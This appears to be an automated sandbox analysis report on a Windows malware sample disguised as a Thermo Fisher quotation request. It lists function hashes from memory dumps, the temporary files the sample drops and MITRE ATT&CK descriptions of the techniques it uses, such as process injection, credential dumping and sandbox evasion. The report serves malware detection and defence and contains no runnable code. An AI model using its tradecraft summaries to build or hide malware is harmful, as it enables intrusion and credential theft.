Opcode ID: e8be00c74ed7163ef69e9318cf351c721fc3a2ce0fba5f6c98ac82f52151ce71
Instruction ID: 244cb38aada79d6c883088241d3d79aa44f6db1c22bcdb3144e9df61c10aa9a9
Opcode Fuzzy Hash: e8be00c74ed7163ef69e9318cf351c721fc3a2ce0fba5f6c98ac82f52151ce71
Instruction Fuzzy Hash: 3F110872F103559BCF109FB9980565E7BFAEB88660F100525D99AE3340EB38C906CBD1

Function 029A1488 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0a57d12a49ab0030811a45120ab07e5f6155af1223d5470cf88c72cc396e48
Instruction ID: 6951f6857b5edfbdb8d7cd8b31a3acc90716d14d4a4b2db649cac59eaf4e1096
Opcode Fuzzy Hash: 1d0a57d12a49ab0030811a45120ab07e5f6155af1223d5470cf88c72cc396e48
Instruction Fuzzy Hash: 46115231A013159FCB11EFB984643AE77FAEB89660F251579D409EB301E736C8828BE5

Function 029A1498 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcec8e8fa3158686c79fecf994c16702ec19f5a579e8ea8b0a84863b82ef2b6e
Instruction ID: 9d4c2e7e6a4d9fc15f2be95d7795f5aa04ec4716e88e523ec968131910dc227d
Opcode Fuzzy Hash: fcec8e8fa3158686c79fecf994c16702ec19f5a579e8ea8b0a84863b82ef2b6e
Instruction Fuzzy Hash: 96014031A013159FCB25EFB984643AE7BFAEB89650F251479D809E7301E736C8818BD5

Function 029AF5BE Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453b53851f5207083b96914068fea0e44634d8e7cedee6c790307c79d749c54f
Instruction ID: 24f4f5432a22a514bc6848d0033e47245336ce38c38ef15d120251f84dc83447
Opcode Fuzzy Hash: 453b53851f5207083b96914068fea0e44634d8e7cedee6c790307c79d749c54f
Instruction Fuzzy Hash: D9F08C35B0021C9FDB00CBA8D844BEEB7F5FBC8326F1482A5E519A7294C73598118BA0

Function 029A80F1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9262b5f013c53c5a4ba98d610a722692270c114e9c9cfafc17be71345275b22
Instruction ID: f9febe70e95426fdeff4773a85e103f4532e21bd6e18483c52354d2871e0ac06
Opcode Fuzzy Hash: c9262b5f013c53c5a4ba98d610a722692270c114e9c9cfafc17be71345275b22
Instruction Fuzzy Hash: D9014474925248DFDB01FFB8D95155D77F5AF82B00F9041BDD04AAB290EB315E0ACB91

Function 029A6E12 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124e10834011fb902d5611db14306583d3105ee33faa77fb05d36022683ded54
Instruction ID: 0e049c00a51a5a7e69d6a125307ea9998563ffec655e5a5d343e46c48341e723
Opcode Fuzzy Hash: 124e10834011fb902d5611db14306583d3105ee33faa77fb05d36022683ded54
Instruction Fuzzy Hash: 4C010871D00308CFEF10DFA8D8687DDBBB9AF48308F288419D415A7291CB789894CB91

Function 029A8100 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6be2330f856525ccfc21a9594eabacc755947a3feea744e4e79ba32bab194d
Instruction ID: a9db15e800052dabf6b6a7f68adc5ad7c1cb30b778d2da977324d1738b31e2cc
Opcode Fuzzy Hash: 3c6be2330f856525ccfc21a9594eabacc755947a3feea744e4e79ba32bab194d
Instruction Fuzzy Hash: C3F03130921249DFDB00FFB8D95159D77F5ABC5B00F9041A9D04AA7290DF316F0ACB91

Function 029AF6B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8146c77ef87e8e9b5e6e5158ae5adcc8a716bcdc104bdbf35a3b7cdb346fbc7
Instruction ID: 859f0cb01f57edc0660f57fc366b9656160fba230a71cd032d0aa015152874e9
Opcode Fuzzy Hash: c8146c77ef87e8e9b5e6e5158ae5adcc8a716bcdc104bdbf35a3b7cdb346fbc7
Instruction Fuzzy Hash: 1DE01A71E0021D9B8B50DEBD99012AA7AF8EB48250F108476D809E7600E732C6008BD1

Function 029A6C0C Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e4a71e02c8665e520d0af94c7f2da29280365ea5cd44086bf69edb55d6a6f3c
Instruction ID: 325bd836c326f0ce92f3d6decf150017636b41c8358d84d65b2fcbbcb6c6c07a
Opcode Fuzzy Hash: 2e4a71e02c8665e520d0af94c7f2da29280365ea5cd44086bf69edb55d6a6f3c
Instruction Fuzzy Hash: 6BC002363541544FC5059768E06447977B5DBCA56935401D6D159CB761CE1558029B40

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Thermo Fisher RFQ_TFS-1207.com.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Skremaskiner.Vig

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\freemanship.txt

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\pressurization.pra

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\restriktivitets.bnk

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\tresindstyvendedeles.ord

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\theatricism.Ste

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dll

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dll

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dll

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
Thermo Fisher RFQ_TFS-1207.com.exe

Function 0040352F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Function 00405718 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C60 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403FD4 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C26 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030A2 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Function 00406591 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004055D9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004032D9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 6FE71817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00406073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre